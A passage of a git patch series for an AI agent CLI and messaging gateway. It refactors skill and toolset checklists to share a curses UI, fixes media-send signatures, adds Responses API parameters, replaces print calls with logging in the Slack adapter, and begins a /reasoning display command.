 def _toggle_by_category(skills: List[dict], disabled: Set[str]) -> Set[str]:
     """Toggle all skills in a category at once."""
-    categories = _get_categories(skills)
-    cat_items = []
-    cat_disabled = set()
-    for cat in categories:
-        cat_skills = [s["name"] for s in skills if (s["category"] or "uncategorized") == cat]
-        cat_items.append(f"{cat} ({len(cat_skills)} skills)")
-        if all(s in disabled for s in cat_skills):
-            cat_disabled.add(f"{cat} ({len(cat_skills)} skills)")
+    from hermes_cli.curses_ui import curses_checklist
 
-    new_cat_disabled = _prompt_checklist("Categories — disable entire categories", cat_items, cat_disabled)
+    categories = _get_categories(skills)
+    cat_labels = []
+    # A category is "enabled" (checked) when NOT all its skills are disabled
+    pre_selected = set()
+    for i, cat in enumerate(categories):
+        cat_skills = [s["name"] for s in skills if (s["category"] or "uncategorized") == cat]
+        cat_labels.append(f"{cat} ({len(cat_skills)} skills)")
+        if not all(s in disabled for s in cat_skills):
+            pre_selected.add(i)
+
+    chosen = curses_checklist(
+        "Categories — toggle entire categories",
+        cat_labels, pre_selected, cancel_returns=pre_selected,
+    )
 
     new_disabled = set(disabled)
     for i, cat in enumerate(categories):
-        label = cat_items[i]
-        cat_skills = [s["name"] for s in skills if (s["category"] or "uncategorized") == cat]
-        if label in new_cat_disabled:
-            new_disabled.update(cat_skills)
+        cat_skills = {s["name"] for s in skills if (s["category"] or "uncategorized") == cat}
+        if i in chosen:
+            new_disabled -= cat_skills  # category enabled → remove from disabled
         else:
-            new_disabled -= set(cat_skills)
+            new_disabled |= cat_skills  # category disabled → add to disabled
     return new_disabled
 
 
@@ -260,8 +126,10 @@ def _toggle_by_category(skills: List[dict], disabled: Set[str]) -> Set[str]:
 
 def skills_command(args=None):
     """Entry point for `hermes skills`."""
+    from hermes_cli.curses_ui import curses_checklist
+
     config = load_config()
-    skills = _list_all_skills_unfiltered()
+    skills = _list_all_skills()
 
     if not skills:
         print(color("  No skills installed.", Colors.DIM))
@@ -288,25 +156,19 @@ def skills_command(args=None):
     if mode == "2":
         new_disabled = _toggle_by_category(skills, disabled)
     else:
-        skill_items = [
+        # Build labels and map indices → skill names
+        labels = [
             f"{s['name']}  ({s['category'] or 'uncategorized'})  —  {s['description'][:55]}"
             for s in skills
         ]
-        disabled_labels = {
-            f"{s['name']}  ({s['category'] or 'uncategorized'})  —  {s['description'][:55]}"
-            for s in skills if s["name"] in disabled
-        }
-        new_disabled_labels = _prompt_checklist(
-            f"Skills for {platform_label}  —  space=toggle, enter=confirm",
-            skill_items,
-            disabled_labels
+        # "selected" = enabled (not disabled) — matches the [✓] convention
+        pre_selected = {i for i, s in enumerate(skills) if s["name"] not in disabled}
+        chosen = curses_checklist(
+            f"Skills for {platform_label}",
+            labels, pre_selected, cancel_returns=pre_selected,
         )
-        # Map labels back to skill names
-        label_to_name = {
-            f"{s['name']}  ({s['category'] or 'uncategorized'})  —  {s['description'][:55]}": s["name"]
-            for s in skills
-        }
-        new_disabled = {label_to_name[l] for l in new_disabled_labels if l in label_to_name}
+        # Anything NOT chosen is disabled
+        new_disabled = {skills[i]["name"] for i in range(len(skills)) if i not in chosen}
 
     if new_disabled == disabled:
         print(color("  No changes.", Colors.DIM))
diff --git a/hermes_cli/tools_config.py b/hermes_cli/tools_config.py
index 5632327e..8b060016 100644
--- a/hermes_cli/tools_config.py
+++ b/hermes_cli/tools_config.py
@@ -463,6 +463,7 @@ def _prompt_choice(question: str, choices: list, default: int = 0) -> int:
 
 def _prompt_toolset_checklist(platform_label: str, enabled: Set[str]) -> Set[str]:
     """Multi-select checklist of toolsets. Returns set of selected toolset keys."""
+    from hermes_cli.curses_ui import curses_checklist
 
     labels = []
     for ts_key, ts_label, ts_desc in CONFIGURABLE_TOOLSETS:
@@ -471,112 +472,18 @@ def _prompt_toolset_checklist(platform_label: str, enabled: Set[str]) -> Set[str
             suffix = "  [no API key]"
         labels.append(f"{ts_label}  ({ts_desc}){suffix}")
 
-    pre_selected_indices = [
+    pre_selected = {
         i for i, (ts_key, _, _) in enumerate(CONFIGURABLE_TOOLSETS)
         if ts_key in enabled
-    ]
+    }
 
-    # Curses-based multi-select — arrow keys + space to toggle + enter to confirm.
-    # simple_term_menu has rendering bugs in tmux, iTerm, and other terminals.
-    try:
-        import curses
-        selected = set(pre_selected_indices)
-        result_holder = [None]
-
-        def _curses_checklist(stdscr):
-            curses.curs_set(0)
-            if curses.has_colors():
-                curses.start_color()
-                curses.use_default_colors()
-                curses.init_pair(1, curses.COLOR_GREEN, -1)
-                curses.init_pair(2, curses.COLOR_YELLOW, -1)
-                curses.init_pair(3, 8, -1)  # dim gray
-            cursor = 0
-            scroll_offset = 0
-
-            while True:
-                stdscr.clear()
-                max_y, max_x = stdscr.getmaxyx()
-                header = f"Tools for {platform_label}  —  ↑↓ navigate, SPACE toggle, ENTER confirm, ESC cancel"
-                try:
-                    stdscr.addnstr(0, 0, header, max_x - 1, curses.A_BOLD | curses.color_pair(2) if curses.has_colors() else curses.A_BOLD)
-                except curses.error:
-                    pass
-
-                visible_rows = max_y - 3
-                if cursor < scroll_offset:
-                    scroll_offset = cursor
-                elif cursor >= scroll_offset + visible_rows:
-                    scroll_offset = cursor - visible_rows + 1
-
-                for draw_i, i in enumerate(range(scroll_offset, min(len(labels), scroll_offset + visible_rows))):
-                    y = draw_i + 2
-                    if y >= max_y - 1:
-                        break
-                    check = "✓" if i in selected else " "
-                    arrow = "→" if i == cursor else " "
-                    line = f" {arrow} [{check}] {labels[i]}"
-
-                    attr = curses.A_NORMAL
-                    if i == cursor:
-                        attr = curses.A_BOLD
-                        if curses.has_colors():
-                            attr |= curses.color_pair(1)
-                    try:
-                        stdscr.addnstr(y, 0, line, max_x - 1, attr)
-                    except curses.error:
-                        pass
-
-                stdscr.refresh()
-                key = stdscr.getch()
-
-                if key in (curses.KEY_UP, ord('k')):
-                    cursor = (cursor - 1) % len(labels)
-                elif key in (curses.KEY_DOWN, ord('j')):
-                    cursor = (cursor + 1) % len(labels)
-                elif key == ord(' '):
-                    if cursor in selected:
-                        selected.discard(cursor)
-                    else:
-                        selected.add(cursor)
-                elif key in (curses.KEY_ENTER, 10, 13):
-                    result_holder[0] = {CONFIGURABLE_TOOLSETS[i][0] for i in selected}
-                    return
-                elif key in (27, ord('q')):  # ESC or q
-                    result_holder[0] = enabled
-                    return
-
-        curses.wrapper(_curses_checklist)
-        return result_holder[0] if result_holder[0] is not None else enabled
-
-    except Exception:
-        pass  # fall through to numbered toggle
-
-    # Final fallback: numbered toggle (Windows without curses, etc.)
-    selected = set(pre_selected_indices)
-    print(color(f"\n  Tools for {platform_label}", Colors.YELLOW))
-    print(color("  Toggle by number, Enter to confirm.\n", Colors.DIM))
-
-    while True:
-        for i, label in enumerate(labels):
-            marker = color("[✓]", Colors.GREEN) if i in selected else "[ ]"
-            print(f"  {marker} {i + 1:>2}. {label}")
-        print()
-        try:
-            val = input(color("  Toggle # (or Enter to confirm): ", Colors.DIM)).strip()
-            if not val:
-                break
-            idx = int(val) - 1
-            if 0 <= idx < len(labels):
-                if idx in selected:
-                    selected.discard(idx)
-                else:
-                    selected.add(idx)
-        except (ValueError, KeyboardInterrupt, EOFError):
-            return enabled
-        print()
-
-    return {CONFIGURABLE_TOOLSETS[i][0] for i in selected}
+    chosen = curses_checklist(
+        f"Tools for {platform_label}",
+        labels,
+        pre_selected,
+        cancel_returns=pre_selected,
+    )
+    return {CONFIGURABLE_TOOLSETS[i][0] for i in chosen}
 
 
 # ─── Provider-Aware Configuration ────────────────────────────────────────────
diff --git a/tests/hermes_cli/test_skills_config.py b/tests/hermes_cli/test_skills_config.py
index 0cf57003..41329793 100644
--- a/tests/hermes_cli/test_skills_config.py
+++ b/tests/hermes_cli/test_skills_config.py
@@ -146,8 +146,8 @@ class TestIsSkillDisabled:
 # ---------------------------------------------------------------------------
 
 class TestFindAllSkillsFiltering:
-    @patch("tools.skills_tool._is_skill_disabled")
-    @patch("tools.skills_tool.skill_matches_platform")
+    @patch("tools.skills_tool._get_disabled_skill_names", return_value={"my-skill"})
+    @patch("tools.skills_tool.skill_matches_platform", return_value=True)
     @patch("tools.skills_tool.SKILLS_DIR")
     def test_disabled_skill_excluded(self, mock_dir, mock_platform, mock_disabled, tmp_path):
         skill_dir = tmp_path / "my-skill"
@@ -156,14 +156,12 @@ class TestFindAllSkillsFiltering:
         skill_md.write_text("---\nname: my-skill\ndescription: A test skill\n---\nContent")
         mock_dir.exists.return_value = True
         mock_dir.rglob.return_value = [skill_md]
-        mock_platform.return_value = True
-        mock_disabled.return_value = True
         from tools.skills_tool import _find_all_skills
         skills = _find_all_skills()
         assert not any(s["name"] == "my-skill" for s in skills)
 
-    @patch("tools.skills_tool._is_skill_disabled")
-    @patch("tools.skills_tool.skill_matches_platform")
+    @patch("tools.skills_tool._get_disabled_skill_names", return_value=set())
+    @patch("tools.skills_tool.skill_matches_platform", return_value=True)
     @patch("tools.skills_tool.SKILLS_DIR")
     def test_enabled_skill_included(self, mock_dir, mock_platform, mock_disabled, tmp_path):
         skill_dir = tmp_path / "my-skill"
@@ -172,12 +170,25 @@ class TestFindAllSkillsFiltering:
         skill_md.write_text("---\nname: my-skill\ndescription: A test skill\n---\nContent")
         mock_dir.exists.return_value = True
         mock_dir.rglob.return_value = [skill_md]
-        mock_platform.return_value = True
-        mock_disabled.return_value = False
         from tools.skills_tool import _find_all_skills
         skills = _find_all_skills()
         assert any(s["name"] == "my-skill" for s in skills)
 
+    @patch("tools.skills_tool._get_disabled_skill_names", return_value={"my-skill"})
+    @patch("tools.skills_tool.skill_matches_platform", return_value=True)
+    @patch("tools.skills_tool.SKILLS_DIR")
+    def test_skip_disabled_returns_all(self, mock_dir, mock_platform, mock_disabled, tmp_path):
+        """skip_disabled=True ignores the disabled set (for config UI)."""
+        skill_dir = tmp_path / "my-skill"
+        skill_dir.mkdir()
+        skill_md = skill_dir / "SKILL.md"
+        skill_md.write_text("---\nname: my-skill\ndescription: A test skill\n---\nContent")
+        mock_dir.exists.return_value = True
+        mock_dir.rglob.return_value = [skill_md]
+        from tools.skills_tool import _find_all_skills
+        skills = _find_all_skills(skip_disabled=True)
+        assert any(s["name"] == "my-skill" for s in skills)
+
 
 # ---------------------------------------------------------------------------
 # _get_categories
diff --git a/tools/skills_tool.py b/tools/skills_tool.py
index 27ae24af..3a78bdfb 100644
--- a/tools/skills_tool.py
+++ b/tools/skills_tool.py
@@ -68,7 +68,7 @@ import os
 import re
 import sys
 from pathlib import Path
-from typing import Dict, Any, List, Optional, Tuple
+from typing import Dict, Any, List, Optional, Set, Tuple
 
 import yaml
 
@@ -223,62 +223,80 @@ def _parse_tags(tags_value) -> List[str]:
 
 
 
-def _is_skill_disabled(name: str, platform: str = None) -> bool:
-    """Check if a skill is disabled in config, globally or for a specific platform.
+def _get_disabled_skill_names() -> Set[str]:
+    """Load disabled skill names from config (once per call).
 
-    Platform is resolved from the ``platform`` argument, then the
-    ``HERMES_PLATFORM`` env var, then falls back to the global disabled list.
+    Resolves platform from ``HERMES_PLATFORM`` env var, falls back to
+    the global disabled list.
     """
     import os
     try:
         from hermes_cli.config import load_config
         config = load_config()
         skills_cfg = config.get("skills", {})
-        # Resolve platform
+        resolved_platform = os.getenv("HERMES_PLATFORM")
+        if resolved_platform:
+            platform_disabled = skills_cfg.get("platform_disabled", {}).get(resolved_platform)
+            if platform_disabled is not None:
+                return set(platform_disabled)
+        return set(skills_cfg.get("disabled", []))
+    except Exception:
+        return set()
+
+
+def _is_skill_disabled(name: str, platform: str = None) -> bool:
+    """Check if a skill is disabled in config."""
+    import os
+    try:
+        from hermes_cli.config import load_config
+        config = load_config()
+        skills_cfg = config.get("skills", {})
         resolved_platform = platform or os.getenv("HERMES_PLATFORM")
         if resolved_platform:
             platform_disabled = skills_cfg.get("platform_disabled", {}).get(resolved_platform)
             if platform_disabled is not None:
                 return name in platform_disabled
-        # Fall back to global disabled list
         return name in skills_cfg.get("disabled", [])
     except Exception:
         return False
 
-def _find_all_skills() -> List[Dict[str, Any]]:
-    """
-    Recursively find all skills in ~/.hermes/skills/.
-    
-    Returns metadata for progressive disclosure (tier 1):
-    - name, description, category
-    
+
+def _find_all_skills(*, skip_disabled: bool = False) -> List[Dict[str, Any]]:
+    """Recursively find all skills in ~/.hermes/skills/.
+
+    Args:
+        skip_disabled: If True, return ALL skills regardless of disabled
+            state (used by ``hermes skills`` config UI). Default False
+            filters out disabled skills.
+
     Returns:
-        List of skill metadata dicts
+        List of skill metadata dicts (name, description, category).
     """
     skills = []
-    
+
     if not SKILLS_DIR.exists():
         return skills
-    
+
+    # Load disabled set once (not per-skill)
+    disabled = set() if skip_disabled else _get_disabled_skill_names()
+
     for skill_md in SKILLS_DIR.rglob("SKILL.md"):
         if any(part in ('.git', '.github', '.hub') for part in skill_md.parts):
             continue
-            
+
         skill_dir = skill_md.parent
-        
+
         try:
             content = skill_md.read_text(encoding='utf-8')
             frontmatter, body = _parse_frontmatter(content)
 
-            # Skip skills incompatible with the current OS platform
             if not skill_matches_platform(frontmatter):
                 continue
-            
+
             name = frontmatter.get('name', skill_dir.name)[:MAX_NAME_LENGTH]
-            # Skip disabled skills
-            if _is_skill_disabled(name):
+            if name in disabled:
                 continue
-            
+
             description = frontmatter.get('description', '')
             if not description:
                 for line in body.strip().split('\n'):
@@ -286,25 +304,25 @@ def _find_all_skills() -> List[Dict[str, Any]]:
                     if line and not line.startswith('#'):
                         description = line
                         break
-            
+
             if len(description) > MAX_DESCRIPTION_LENGTH:
                 description = description[:MAX_DESCRIPTION_LENGTH - 3] + "..."
-            
+
             category = _get_category_from_path(skill_md)
-            
+
             skills.append({
                 "name": name,
                 "description": description,
                 "category": category,
             })
-            
+
         except (UnicodeDecodeError, PermissionError) as e:
             logger.warning("Failed to read skill file %s: %s", skill_md, e)
             continue
         except Exception as e:
             logger.warning("Error parsing skill %s: %s", skill_md, e, exc_info=True)
             continue
-    
+
     return skills
 
 

From 69090d6da1cf2520aa08d17e483c49e12e264c0c Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 03:23:53 -0700
Subject: [PATCH 067/105] fix: add **kwargs to base/telegram media send methods
 for metadata routing
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

The MEDIA routing in _process_message_background passes
metadata=_thread_metadata to send_video, send_document, and
send_image_file — but none accepted it, causing TypeError silently
caught by the except handler. Files just failed to send.

Fix: add **kwargs to all four base class media methods and their
Telegram overrides.
---
 gateway/platforms/base.py     | 4 ++++
 gateway/platforms/telegram.py | 3 +++
 2 files changed, 7 insertions(+)

diff --git a/gateway/platforms/base.py b/gateway/platforms/base.py
index f4ab43ea..ba8d763c 100644
--- a/gateway/platforms/base.py
+++ b/gateway/platforms/base.py
@@ -516,6 +516,7 @@ class BasePlatformAdapter(ABC):
         audio_path: str,
         caption: Optional[str] = None,
         reply_to: Optional[str] = None,
+        **kwargs,
     ) -> SendResult:
         """
         Send an audio file as a native voice message via the platform API.
@@ -535,6 +536,7 @@ class BasePlatformAdapter(ABC):
         video_path: str,
         caption: Optional[str] = None,
         reply_to: Optional[str] = None,
+        **kwargs,
     ) -> SendResult:
         """
         Send a video natively via the platform API.
@@ -554,6 +556,7 @@ class BasePlatformAdapter(ABC):
         caption: Optional[str] = None,
         file_name: Optional[str] = None,
         reply_to: Optional[str] = None,
+        **kwargs,
     ) -> SendResult:
         """
         Send a document/file natively via the platform API.
@@ -572,6 +575,7 @@ class BasePlatformAdapter(ABC):
         image_path: str,
         caption: Optional[str] = None,
         reply_to: Optional[str] = None,
+        **kwargs,
     ) -> SendResult:
         """
         Send a local image file natively via the platform API.
diff --git a/gateway/platforms/telegram.py b/gateway/platforms/telegram.py
index 390d0104..5243d302 100644
--- a/gateway/platforms/telegram.py
+++ b/gateway/platforms/telegram.py
@@ -353,6 +353,7 @@ class TelegramAdapter(BasePlatformAdapter):
         image_path: str,
         caption: Optional[str] = None,
         reply_to: Optional[str] = None,
+        **kwargs,
     ) -> SendResult:
         """Send a local image file natively as a Telegram photo."""
         if not self._bot:
@@ -387,6 +388,7 @@ class TelegramAdapter(BasePlatformAdapter):
         caption: Optional[str] = None,
         file_name: Optional[str] = None,
         reply_to: Optional[str] = None,
+        **kwargs,
     ) -> SendResult:
         """Send a document/file natively as a Telegram file attachment."""
         if not self._bot:
@@ -417,6 +419,7 @@ class TelegramAdapter(BasePlatformAdapter):
         video_path: str,
         caption: Optional[str] = None,
         reply_to: Optional[str] = None,
+        **kwargs,
     ) -> SendResult:
         """Send a video natively as a Telegram video message."""
         if not self._bot:

From a82ce602946637929bab454b368c2dd522e9889b Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 04:28:31 -0700
Subject: [PATCH 068/105] fix: add missing Responses API parameters for Codex
 provider
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adds tool_choice, parallel_tool_calls, and prompt_cache_key to the
Codex Responses API request kwargs — matching what the official Codex
CLI sends.

- tool_choice: 'auto' — enables the model to proactively call tools.
  Without this, the model may default to not using tools, which explains
  reports of the agent claiming it lacks shell access (#747).
- parallel_tool_calls: True — allows the model to issue multiple tool
  calls in a single turn for efficiency.
- prompt_cache_key: session_id — enables server-side prompt caching
  across turns in the same session, reducing latency and cost.

Refs #747
---
 run_agent.py                            | 3 +++
 tests/test_run_agent_codex_responses.py | 4 ++++
 2 files changed, 7 insertions(+)

diff --git a/run_agent.py b/run_agent.py
index 57e2a13b..9b3a7dba 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -2340,7 +2340,10 @@ class AIAgent:
                 "instructions": instructions,
                 "input": self._chat_messages_to_responses_input(payload_messages),
                 "tools": self._responses_tools(),
+                "tool_choice": "auto",
+                "parallel_tool_calls": True,
                 "store": False,
+                "prompt_cache_key": self.session_id,
             }
 
             if reasoning_enabled:
diff --git a/tests/test_run_agent_codex_responses.py b/tests/test_run_agent_codex_responses.py
index a1e5e817..cf2694f0 100644
--- a/tests/test_run_agent_codex_responses.py
+++ b/tests/test_run_agent_codex_responses.py
@@ -235,6 +235,10 @@ def test_build_api_kwargs_codex(monkeypatch):
     assert kwargs["tools"][0]["strict"] is False
     assert "function" not in kwargs["tools"][0]
     assert kwargs["store"] is False
+    assert kwargs["tool_choice"] == "auto"
+    assert kwargs["parallel_tool_calls"] is True
+    assert isinstance(kwargs["prompt_cache_key"], str)
+    assert len(kwargs["prompt_cache_key"]) > 0
     assert "timeout" not in kwargs
     assert "max_tokens" not in kwargs
     assert "extra_body" not in kwargs

From 9149c34a26d2287cd98cd8f3a51011d27023b085 Mon Sep 17 00:00:00 2001
From: aydnOktay <xaydinoktay@gmail.com>
Date: Wed, 11 Mar 2026 05:34:43 -0700
Subject: [PATCH 069/105] refactor(slack): replace print statements with
 structured logging

Replaces all ad-hoc print() calls in the Slack gateway adapter with
proper logging.getLogger(__name__) calls, matching the pattern already
used by every other platform adapter (telegram, discord, whatsapp,
signal, homeassistant).

Changes:
- Add import logging + module-level logger
- Use logger.error for failures, logger.warning for non-critical
  fallbacks, logger.info for status, logger.debug for routine ops
- Add exc_info=True for full stack traces on all error/warning paths
- Use %s format strings (lazy evaluation) instead of f-strings
- Wrap disconnect() in try/except for safety
- Add structured context (file paths, channel IDs, URLs) to log messages
- Convert document handling prints added after the original PR

Cherry-picked from PR #778 by aydnOktay, rebased onto current main
with conflict resolution and extended to cover document/video methods
added since the PR was created.

Co-authored-by: aydnOktay <xaydinoktay@gmail.com>
---
 gateway/platforms/slack.py | 108 +++++++++++++++++++++++++++----------
 1 file changed, 80 insertions(+), 28 deletions(-)

diff --git a/gateway/platforms/slack.py b/gateway/platforms/slack.py
index 3449971f..f7f0dda2 100644
--- a/gateway/platforms/slack.py
+++ b/gateway/platforms/slack.py
@@ -9,6 +9,7 @@ Uses slack-bolt (Python) with Socket Mode for:
 """
 
 import asyncio
+import logging
 import os
 import re
 from typing import Dict, List, Optional, Any
@@ -41,6 +42,9 @@ from gateway.platforms.base import (
 )
 
 
+logger = logging.getLogger(__name__)
+
+
 def check_slack_requirements() -> bool:
     """Check if Slack dependencies are available."""
     return SLACK_AVAILABLE
@@ -73,17 +77,19 @@ class SlackAdapter(BasePlatformAdapter):
     async def connect(self) -> bool:
         """Connect to Slack via Socket Mode."""
         if not SLACK_AVAILABLE:
-            print("[Slack] slack-bolt not installed. Run: pip install slack-bolt")
+            logger.error(
+                "[Slack] slack-bolt not installed. Run: pip install slack-bolt",
+            )
             return False
 
         bot_token = self.config.token
         app_token = os.getenv("SLACK_APP_TOKEN")
 
         if not bot_token:
-            print("[Slack] SLACK_BOT_TOKEN not set")
+            logger.error("[Slack] SLACK_BOT_TOKEN not set")
             return False
         if not app_token:
-            print("[Slack] SLACK_APP_TOKEN not set")
+            logger.error("[Slack] SLACK_APP_TOKEN not set")
             return False
 
         try:
@@ -117,19 +123,22 @@ class SlackAdapter(BasePlatformAdapter):
             asyncio.create_task(self._handler.start_async())
 
             self._running = True
-            print(f"[Slack] Connected as @{bot_name} (Socket Mode)")
+            logger.info("[Slack] Connected as @%s (Socket Mode)", bot_name)
             return True
 
-        except Exception as e:
-            print(f"[Slack] Connection failed: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[Slack] Connection failed: %s", e, exc_info=True)
             return False
 
     async def disconnect(self) -> None:
         """Disconnect from Slack."""
         if self._handler:
-            await self._handler.close_async()
+            try:
+                await self._handler.close_async()
+            except Exception as e:  # pragma: no cover - defensive logging
+                logger.warning("[Slack] Error while closing Socket Mode handler: %s", e, exc_info=True)
         self._running = False
-        print("[Slack] Disconnected")
+        logger.info("[Slack] Disconnected")
 
     async def send(
         self,
@@ -162,8 +171,8 @@ class SlackAdapter(BasePlatformAdapter):
                 raw_response=result,
             )
 
-        except Exception as e:
-            print(f"[Slack] Send error: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error("[Slack] Send error: %s", e, exc_info=True)
             return SendResult(success=False, error=str(e))
 
     async def edit_message(
@@ -182,7 +191,14 @@ class SlackAdapter(BasePlatformAdapter):
                 text=content,
             )
             return SendResult(success=True, message_id=message_id)
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[Slack] Failed to edit message %s in channel %s: %s",
+                message_id,
+                chat_id,
+                e,
+                exc_info=True,
+            )
             return SendResult(success=False, error=str(e))
 
     async def send_typing(self, chat_id: str, metadata=None) -> None:
@@ -214,8 +230,14 @@ class SlackAdapter(BasePlatformAdapter):
             )
             return SendResult(success=True, raw_response=result)
 
-        except Exception as e:
-            print(f"[{self.name}] Failed to send local image: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to send local Slack image %s: %s",
+                self.name,
+                image_path,
+                e,
+                exc_info=True,
+            )
             return await super().send_image_file(chat_id, image_path, caption, reply_to)
 
     async def send_image(
@@ -247,7 +269,13 @@ class SlackAdapter(BasePlatformAdapter):
 
             return SendResult(success=True, raw_response=result)
 
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.warning(
+                "[Slack] Failed to upload image from URL %s, falling back to text: %s",
+                image_url,
+                e,
+                exc_info=True,
+            )
             # Fall back to sending the URL as text
             text = f"{caption}\n{image_url}" if caption else image_url
             return await self.send(chat_id=chat_id, content=text, reply_to=reply_to)
@@ -273,7 +301,13 @@ class SlackAdapter(BasePlatformAdapter):
             )
             return SendResult(success=True, raw_response=result)
 
-        except Exception as e:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[Slack] Failed to send audio file %s: %s",
+                audio_path,
+                e,
+                exc_info=True,
+            )
             return SendResult(success=False, error=str(e))
 
     async def send_video(
@@ -300,8 +334,14 @@ class SlackAdapter(BasePlatformAdapter):
             )
             return SendResult(success=True, raw_response=result)
 
-        except Exception as e:
-            print(f"[{self.name}] Failed to send video: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to send video %s: %s",
+                self.name,
+                video_path,
+                e,
+                exc_info=True,
+            )
             return await super().send_video(chat_id, video_path, caption, reply_to)
 
     async def send_document(
@@ -331,8 +371,14 @@ class SlackAdapter(BasePlatformAdapter):
             )
             return SendResult(success=True, raw_response=result)
 
-        except Exception as e:
-            print(f"[{self.name}] Failed to send document: {e}")
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[%s] Failed to send document %s: %s",
+                self.name,
+                file_path,
+                e,
+                exc_info=True,
+            )
             return await super().send_document(chat_id, file_path, caption, file_name, reply_to)
 
     async def get_chat_info(self, chat_id: str) -> Dict[str, Any]:
@@ -348,7 +394,13 @@ class SlackAdapter(BasePlatformAdapter):
                 "name": channel.get("name", chat_id),
                 "type": "dm" if is_dm else "group",
             }
-        except Exception:
+        except Exception as e:  # pragma: no cover - defensive logging
+            logger.error(
+                "[Slack] Failed to fetch chat info for %s: %s",
+                chat_id,
+                e,
+                exc_info=True,
+            )
             return {"name": chat_id, "type": "unknown"}
 
     # ----- Internal handlers -----
@@ -403,8 +455,8 @@ class SlackAdapter(BasePlatformAdapter):
                     media_urls.append(cached)
                     media_types.append(mimetype)
                     msg_type = MessageType.PHOTO
-                except Exception as e:
-                    print(f"[Slack] Failed to cache image: {e}", flush=True)
+                except Exception as e:  # pragma: no cover - defensive logging
+                    logger.warning("[Slack] Failed to cache image from %s: %s", url, e, exc_info=True)
             elif mimetype.startswith("audio/") and url:
                 try:
                     ext = "." + mimetype.split("/")[-1].split(";")[0]
@@ -414,8 +466,8 @@ class SlackAdapter(BasePlatformAdapter):
                     media_urls.append(cached)
                     media_types.append(mimetype)
                     msg_type = MessageType.VOICE
-                except Exception as e:
-                    print(f"[Slack] Failed to cache audio: {e}", flush=True)
+                except Exception as e:  # pragma: no cover - defensive logging
+                    logger.warning("[Slack] Failed to cache audio from %s: %s", url, e, exc_info=True)
             elif url:
                 # Try to handle as a document attachment
                 try:
@@ -437,7 +489,7 @@ class SlackAdapter(BasePlatformAdapter):
                     file_size = f.get("size", 0)
                     MAX_DOC_BYTES = 20 * 1024 * 1024
                     if not file_size or file_size > MAX_DOC_BYTES:
-                        print(f"[Slack] Document too large or unknown size: {file_size}", flush=True)
+                        logger.warning("[Slack] Document too large or unknown size: %s", file_size)
                         continue
 
                     # Download and cache
@@ -449,7 +501,7 @@ class SlackAdapter(BasePlatformAdapter):
                     media_urls.append(cached_path)
                     media_types.append(doc_mime)
                     msg_type = MessageType.DOCUMENT
-                    print(f"[Slack] Cached user document: {cached_path}", flush=True)
+                    logger.debug("[Slack] Cached user document: %s", cached_path)
 
                     # Inject text content for .txt/.md files (capped at 100 KB)
                     MAX_TEXT_INJECT_BYTES = 100 * 1024
@@ -466,8 +518,8 @@ class SlackAdapter(BasePlatformAdapter):
                         except UnicodeDecodeError:
                             pass  # Binary content, skip injection
 
-                except Exception as e:
-                    print(f"[Slack] Failed to cache document: {e}", flush=True)
+                except Exception as e:  # pragma: no cover - defensive logging
+                    logger.warning("[Slack] Failed to cache document from %s: %s", url, e, exc_info=True)
 
         # Build source
         source = self.build_source(

From 4d873f77c1a7316d2dc2c51c4afd26904a66573c Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 05:53:21 -0700
Subject: [PATCH 070/105] feat(cli): add /reasoning command for effort level
 and display toggle

Combined implementation of reasoning management:
- /reasoning              Show current effort level and display state
- /reasoning <level>      Set reasoning effort (none, low, medium, high, xhigh)
- /reasoning show|on      Show model thinking/reasoning in output
- /reasoning hide|off     Hide model thinking/reasoning from output

Effort level changes persist to config and force agent re-init.
Display toggle updates the agent callback dynamically without re-init.

When display is enabled:
- Intermediate reasoning shown as dim [thinking] lines during tool loops
- Final reasoning shown in a bordered box above the response
- Long reasoning collapsed (5 lines intermediate, 10 lines final)

Also adds:
- reasoning_callback parameter to AIAgent
- last_reasoning in run_conversation result dict
- show_reasoning config option (display section, default: false)
- Display section in /config output
- 34 tests covering both features

Combines functionality from PR #789 and PR #790.

Co-authored-by: Aum Desai <Aum08Desai@users.noreply.github.com>
Co-authored-by: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
---
 cli-config.yaml.example                  |   5 +
 cli.py                                   |  93 +++++
 hermes_cli/commands.py                   |   1 +
 hermes_cli/config.py                     |   9 +
 run_agent.py                             |  16 +
 tests/hermes_cli/test_commands.py        |   2 +-
 tests/test_reasoning_command.py          | 422 +++++++++++++++++++++++
 website/docs/reference/cli-commands.md   |   1 +
 website/docs/user-guide/cli.md           |   1 +
 website/docs/user-guide/configuration.md |  11 +
 10 files changed, 560 insertions(+), 1 deletion(-)
 create mode 100644 tests/test_reasoning_command.py

diff --git a/cli-config.yaml.example b/cli-config.yaml.example
index 33f3702c..0f68eae2 100644
--- a/cli-config.yaml.example
+++ b/cli-config.yaml.example
@@ -670,6 +670,11 @@ display:
   # Works over SSH. Most terminals can be configured to flash the taskbar or play a sound.
   bell_on_complete: false
 
+  # Show model reasoning/thinking before each response.
+  # When enabled, a dim box shows the model's thought process above the response.
+  # Toggle at runtime with /reasoning show or /reasoning hide.
+  show_reasoning: false
+
   # ───────────────────────────────────────────────────────────────────────────
   # Skin / Theme
   # ───────────────────────────────────────────────────────────────────────────
diff --git a/cli.py b/cli.py
index 5eb9577b..1499ca96 100755
--- a/cli.py
+++ b/cli.py
@@ -205,6 +205,7 @@ def load_cli_config() -> Dict[str, Any]:
         "display": {
             "compact": False,
             "resume_display": "full",
+            "show_reasoning": False,
             "skin": "default",
         },
         "clarify": {
